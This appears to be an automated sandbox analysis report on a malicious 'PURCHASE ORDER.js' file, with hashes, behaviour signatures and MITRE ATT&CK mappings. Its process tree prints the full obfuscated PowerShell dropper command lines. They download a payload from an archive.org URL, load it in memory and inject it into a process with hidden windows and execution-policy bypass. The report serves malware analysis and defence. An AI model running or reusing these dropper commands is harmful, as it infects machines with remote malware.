9953c57867a87d6d545da17a94580d567c4193ab28b70de8dd9ac253f11e2969

General

Target

PURCHASE ORDER.js
Size

319KB
MD5

e8114157714655fdbc7b51cde4f676de
SHA1

c23a2b3c76b2b7927f64cf74c3cf75b408a629e4
SHA256

d20d1cb56afa7818be3b26074bed7eae73e5480a5a8e0add5384bc9eddbc333d
SHA512

9f33a77504f56f4b0bce859d3b61f81cf3496a00d6cfd3aaef708f700149c72f1fb009f15e720a59b013a443c15b3c68a621358c624138b72f3409db53692c8b
SSDEEP

6144:1m06WlUzat6poIKNrZUG8IyWwmRn+CvA1HPucBzprZa8qYlVLY8/1PcKpOu4:w06WF6poIKN9UGDykRn+gA1HPu4zpNar

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2344	powershell.exe
6	2344	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2520	powershell.exe
2344	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2520	powershell.exe
2344	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3048 wrote to memory of 2520	3048	wscript.exe	30
PID 3048 wrote to memory of 2520	3048	wscript.exe	30
PID 3048 wrote to memory of 2520	3048	wscript.exe	30
PID 2520 wrote to memory of 2344	2520	powershell.exe	32
PID 2520 wrote to memory of 2344	2520	powershell.exe	32
PID 2520 wrote to memory of 2344	2520	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAGIATQBCAHUAcgBsACcAKwAnACAAPQAgAE4AVwAnACsAJwBxAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwArACcALwAnACsAJwBpAGEAJwArACcAOQAnACsAJwAwADQAJwArACcANgAwACcAKwAnADEALgB1AHMALgBhAHIAJwArACcAYwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AJwArACcAaQB0ACcAKwAnAGUAbQBzAC8AZABlAHQAYQBoACcAKwAnAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAZQBKAC4AdAB4AHQATgBXAHEAOwBiAE0AQgBiACcAKwAnAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACAAJwArACcAPQAnACsAJwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AJwArACcATgAnACsAJwBlAHQALgAnACsAJwBXAGUAYgBDAGwAaQBlAG4AdAApAC4AJwArACcARABvAHcAbgAnACsAJwBsAG8AYQBkACcAKwAnAFMAJwArACcAdAByAGkAbgBnACgAYgBNAEIAdQByAGwAJwArACcAKQA7AGIATQAnACsAJwBCAGIAJwArACcAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAIAA9ACAAJwArACcAWwAnACsAJwBTAHkAcwB0AGUAbQAuACcAKwAnAEMAJwArACcAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwAnACsAJwBlACcAKwAnADYANABTACcAKwAnAHQAcgBpAG4AZwAoAGIATQBCAGIAJwArACcAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwBuAHQAZQBuAHQAKQAnACsAJwA7AGIATQAnACsAJwBCAGEAJwArACcAcwBzAGUAbQBiACcAKwAnAGwAeQAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQAnACsAJwBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGIATQBCAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAKQA7AGIATQAnACsAJwBCAHQAeQBwAGUAIAA9ACAAYgBNAEIAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5ACcAKwAnAHAAJwArACcAZQAoAE4AJwArACcAVwBxAFIAdQAnACsAJwBuAFAARQAuAEgAbwAnACsAJwBtAGUATgBXAHEAKQA7AGIATQBCAG0AZQB0AGgAbwBkACAAPQAgAGIATQBCAHQAeQBwAGUALgAnACsAJwBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAE4AVwBxAFYAQQBJAE4AVwBxACkAOwBiACcAKwAnAE0AQgAnACsAJwBtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAYgBNAEIAbgB1ACcAKwAnAGwAbAAsACAAWwBvAGIAagAnACsAJwBlACcAKwAnAGMAdABbAF0AXQBAACgATgBXAHEAdAB4AHQAJwArACcALgBhAGYAYQAvAHYAZQBkAC4AJwArACcAMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgAnACsAJwBjADAAJwArACcAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAnACsAJwAyAC0AYgB1AHAALwAvADoAcwBwACcAKwAnAHQAdABoAE4AVwBxACcAKwAnACAALAAgAE4AVwBxAGQAZQBzAGEAJwArACcAdABpAHYAJwArACcAYQBkAG8ATgBXAHEAIAAnACsAJwAsACAAJwArACcATgAnACsAJwBXAHEAZABlAHMAYQB0AGkAdgBhAGQAbwBOAFcAcQAgACcAKwAnACwAIABOAFcAcQAnACsAJwBkAGUAcwBhAHQAaQB2AGEAJwArACcAZABvAE4AVwBxACwAJwArACcATgBXAHEAQQAnACsAJwBkAGQAJwArACcASQBuACcAKwAnAFAAcgBvAGMAZQAnACsAJwBzAHMAMwAyAE4AVwBxACwATgAnACsAJwBXAHEAZABlACcAKwAnAHMAYQAnACsAJwB0ACcAKwAnAGkAdgBhACcAKwAnAGQAJwArACcAbwBOAFcAJwArACcAcQApACkAJwArACcAOwAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA5ADgAKwBbAGMASABhAFIAXQA3ADcAKwBbAGMASABhAFIAXQA2ADYAKQAsACcAJAAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA3ADgAKwBbAGMASABhAFIAXQA4ADcAKwBbAGMASABhAFIAXQAxADEAMwApACwAWwBzAHQAUgBJAG4ARwBdAFsAYwBIAGEAUgBdADMAOQApAHwAIAAuACgAIAAkAHAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBoAE8AbQBlAFsAMwA0AF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bMBurl'+' = NW'+'qhttps:'+'/'+'/'+'ia'+'9'+'04'+'60'+'1.us.ar'+'chive.org'+'/6/'+'it'+'ems/detah'+'-note-j/Detah'+'NoteJ.txtNWq;bMBb'+'ase64Content '+'='+' (New-Object System.'+'N'+'et.'+'WebClient).'+'Down'+'load'+'S'+'tring(bMBurl'+');bM'+'Bb'+'in'+'aryContent = '+'['+'System.'+'C'+'onvert]::FromBas'+'e'+'64S'+'tring(bMBb'+'as'+'e64C'+'ontent)'+';bM'+'Ba'+'ssemb'+'ly = [Reflecti'+'on.Assembly]::Load(bMBbin'+'aryContent);bM'+'Btype = bMBassembly.GetTy'+'p'+'e(N'+'WqRu'+'nPE.Ho'+'meNWq);bMBmethod = bMBtype.'+'Get'+'M'+'ethod(NWqVAINWq);b'+'MB'+'method.Invoke(bMBnu'+'ll, [obj'+'e'+'ct[]]@(NWqtxt'+'.afa/ved.'+'2r.39b345302a075b1b'+'c0'+'d45b632eb9ee6'+'2-bup//:sp'+'tthNWq'+' , NWqdesa'+'tiv'+'adoNWq '+', '+'N'+'WqdesativadoNWq '+', NWq'+'desativa'+'doNWq,'+'NWqA'+'dd'+'In'+'Proce'+'ss32NWq,N'+'Wqde'+'sa'+'t'+'iva'+'d'+'oNW'+'q))'+';').REPLaCE(([cHaR]98+[cHaR]77+[cHaR]66),'$').REPLaCE(([cHaR]78+[cHaR]87+[cHaR]113),[stRInG][cHaR]39)| .( $pSHome[21]+$pshOme[34]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
38cf00f125988fce7dc597ba54914976

SHA1
603a2094c270771b87b2f2fdce073c7eadacb7cb

SHA256
e72f2e69e79b647b7f1394b2e1e8d6799913dcedd38890bac506a3bce89f41b7

SHA512
26a85c43163c0031d96f0bc0da505346087dc853763f72d5de60f5960be27fe1f4f044a7ac3b5318d3529b264097297f643146aeefbcefa15b57f46f47cbdfe7

Download Submit
memory/2520-4-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

Filesize
4KB

Download
memory/2520-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2520-6-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-7-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

Filesize
32KB

Download
memory/2520-8-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-9-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-10-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-12-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-17-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing